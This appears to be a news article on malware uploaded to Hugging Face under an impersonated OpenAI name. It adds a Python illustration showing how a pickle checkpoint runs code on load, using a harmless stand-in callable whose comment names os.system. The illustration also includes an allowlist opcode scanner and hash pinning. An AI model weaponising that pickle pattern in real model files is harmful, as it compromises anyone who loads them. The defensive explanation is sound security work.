- Hugging Face hosted malicious software packaged and named to mimic an OpenAI release, AI News reported on May 12.
- The malware was distributed via the model registry’s standard download flow, exploiting users’ trust in the platform’s namespace.
- The incident underscores the absence of strong author-verification primitives on the world’s largest open AI model registry.
- Hugging Face has removed the offending uploads and is reviewing additional uploads tied to the same author accounts.
What Happened
Hugging Face, the largest open-source registry of AI models and datasets, hosted malicious software masquerading as a legitimate OpenAI release, AI News reported on May 12. The malicious uploads used naming conventions and metadata designed to convince developers that they were downloading an official OpenAI-published artefact. The files were distributed through the standard model-download flow used by millions of developers who integrate Hugging Face into local environments and CI pipelines, so nothing about the download path itself looked unusual; the deception lay entirely in the namespace and metadata.
Why It Matters
The incident exposes a structural gap in supply-chain security for open AI distribution. Hugging Face's namespace allows third-party uploads under arbitrary author names; unlike package managers such as npm or PyPI, which have added typosquatting defences and provenance or signing controls in recent years (npm package provenance, PyPI Trusted Publishers and attestations), Hugging Face's verified-publisher signals are limited and inconsistently surfaced in the user interface. Researchers at ReversingLabs and JFrog documented similar Hugging Face malware incidents in 2024 and 2025, but impersonating OpenAI raises the risk profile: it borrows the credibility of one of the most trusted names in the AI namespace, so developers who would scrutinise an unknown uploader are less likely to scrutinise this one.
Technical Details
The malicious uploads were structured as model artefacts that, when loaded with standard Hugging Face Transformers or other library functions, execute code on the host machine. Hugging Face has previously warned that pickle-based serialisation formats, common in older model checkpoints, allow arbitrary code execution on deserialisation: a pickle stream can reference any importable callable and invoke it while the file is being loaded, before any inference runs, so simply opening the checkpoint is enough. The platform has been migrating users toward the Safetensors format, which stores only tensor data and metadata and has no code-execution path, but pickle-based files remain in wide circulation. AI News did not name the specific exploitation technique used in this incident; comparable past cases have employed Python's pickle deserialisation, malicious tokenizer scripts, and custom model code that runs when a repository is loaded with trust_remote_code=True. Hugging Face has confirmed removal of the offending uploads and is reviewing additional artefacts associated with the same uploader accounts.
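The following is an added illustration, not code from AI News, Hugging Face or any affected project. It uses only the Python standard library to show three things the paragraph above describes in prose: why a pickle checkpoint executes code the moment it is loaded, a fail-closed opcode scan that refuses any stream importing a global outside an allowlist, and a content-hash pin so that a loader accepts reviewed bytes rather than whatever currently sits under an author name. The `MaliciousCheckpoint` class, the sample state_dict, and the `ALLOWED_GLOBALS` list are all constructed for this example; `platform.node` stands in for the `os.system` call a real payload would use.

```python
"""Added example: pickle RCE at load time, a fail-closed opcode scan, and a
content-hash pin. Stdlib only; checkpoint contents and allowlist are constructed."""
import hashlib
import hmac
import pickle
import pickletools
import platform
from collections import OrderedDict

# Globals a plain state_dict legitimately references. An assumption for this
# example; PyTorch's weights_only unpickler carries a much longer list.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
    ("torch._utils", "_rebuild_tensor_v2"),
    ("torch", "FloatStorage"),
}
STRING_PUSH = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}
NO_STACK_EFFECT = {"PROTO", "FRAME", "MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}


class MaliciousCheckpoint:
    """Constructed stand-in for a poisoned model file. pickle writes only the
    (callable, args) pair returned by __reduce__; the loader then calls it."""

    def __reduce__(self):
        # Harmless callable for the demo. A real payload puts os.system or
        # subprocess.Popen here; the class itself never appears in the file.
        return (platform.node, ())


def build_malicious_pickle(protocol=4) -> bytes:
    return pickle.dumps(MaliciousCheckpoint(), protocol=protocol)


def build_benign_pickle(protocol=4) -> bytes:
    # Tiny constructed state_dict; lists stand in for tensors so torch is not needed.
    weights = OrderedDict([("layer.weight", [0.1, -0.2]), ("layer.bias", [0.0])])
    return pickle.dumps(weights, protocol=protocol)


def scan_pickle(data: bytes) -> list:
    """Static scan of the opcode stream. Returns findings; empty means every
    global the stream imports is allowlisted. Fails closed: a STACK_GLOBAL whose
    operands were not pushed as literal strings right before it (e.g. fetched
    from the memo) is reported rather than guessed at."""
    findings = []
    pending = []  # string literals pushed since the last stack-changing opcode
    for op, arg, pos in pickletools.genops(data):
        if op.name in STRING_PUSH:
            pending.append(arg)
            continue
        if op.name in NO_STACK_EFFECT:
            continue
        if op.name == "GLOBAL":           # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            if (module, name) not in ALLOWED_GLOBALS:
                findings.append(f"offset {pos}: disallowed global {module}.{name}")
        elif op.name == "STACK_GLOBAL":   # protocol 4+: operands come off the stack
            if len(pending) < 2:
                findings.append(f"offset {pos}: STACK_GLOBAL with indirect operands, refusing")
            else:
                module, name = pending[-2], pending[-1]
                if (module, name) not in ALLOWED_GLOBALS:
                    findings.append(f"offset {pos}: disallowed global {module}.{name}")
        pending = []
    return findings


def unsafe_load(data: bytes):
    """What a bare pickle.load (or torch.load with weights_only=False) amounts to."""
    return pickle.loads(data)


def safe_load(data: bytes):
    """Scan first; deserialise only a clean stream."""
    findings = scan_pickle(data)
    if findings:
        raise ValueError("refusing to unpickle: " + "; ".join(findings))
    return pickle.loads(data)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def load_pinned(data: bytes, expected_sha256: str):
    """Pin to the bytes that were reviewed, not to an author or repository name."""
    actual = sha256_hex(data)
    if not hmac.compare_digest(actual, expected_sha256):
        raise ValueError(f"hash mismatch: expected {expected_sha256}, got {actual}")
    return safe_load(data)


def demo() -> dict:
    """Exercise both pickle protocols and both load paths; results as a dict."""
    mal, ben = build_malicious_pickle(), build_benign_pickle()
    out = {
        "malicious_findings": scan_pickle(mal),
        "malicious_findings_p2": scan_pickle(build_malicious_pickle(protocol=2)),
        "benign_findings": scan_pickle(ben) + scan_pickle(build_benign_pickle(protocol=2)),
        "payload_ran_on_unsafe_load": unsafe_load(mal) == platform.node(),
        "benign_state_dict": safe_load(ben),
    }
    for key, fn in (("malicious_blocked", lambda: safe_load(mal)),
                    ("tampered_blocked", lambda: load_pinned(mal, sha256_hex(ben)))):
        try:
            fn()
            out[key] = False
        except ValueError:
            out[key] = True
    out["pinned_state_dict"] = load_pinned(ben, sha256_hex(ben))
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two caveats worth keeping in mind. An allowlist scan is only as strong as its list: `torch.load(weights_only=True)`, the default since PyTorch 2.6, applies the same idea with a far longer allowlist inside a restricted unpickler, and Hugging Face's own upload-time pickle scanning works the same way, but any gadget reachable through an allowlisted global still gets through. Safetensors removes the problem class rather than filtering it, which is why the scan above belongs only on the legacy path you cannot yet retire.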
Who’s Affected
Any developer who downloaded and then loaded the impersonating artefact may have executed the malicious code in their local Python environment; downloading alone is not enough, but a load is exactly what any "try the model" step performs. Enterprise security teams that have allow-listed Hugging Face as a trusted source for model artefacts should reassess that posture, since the allow-list covers the host, not the uploader. The incident is particularly relevant for organisations that pull models in CI/CD pipelines, where a payload runs with the pipeline's own credentials and can reach build secrets, registries and downstream artefacts before anyone looks at a log. Hugging Face has more than 5 million users and hosts over 1.7 million model repositories, per the company's published statistics; the scale that makes the platform indispensable also makes any namespace-trust failure broadly consequential. OpenAI is the impersonated party and has not, per the report, issued a public statement.
What’s Next
Hugging Face has historically responded to malware incidents by tightening repository scanning and accelerating Safetensors adoption. Expect renewed pressure for verified-publisher badges to be made more prominent in the model-card UI and for library defaults to refuse pickle-based loads unless explicitly opted in; PyTorch 2.6 already switched torch.load to weights_only=True by default, and Transformers prefers Safetensors weights where a repository provides them, but older checkpoints and older library versions remain exposed. Industry working groups, including the AI Verification Foundation and SLSA's adoption track for ML artefacts, will likely reference the incident in upcoming reports. Enterprises pulling open models in production should audit their dependency pipelines and pin artefacts to a specific commit (the revision parameter in huggingface_hub accepts a commit hash) with file hashes verified at load time, rather than trusting an author name alone.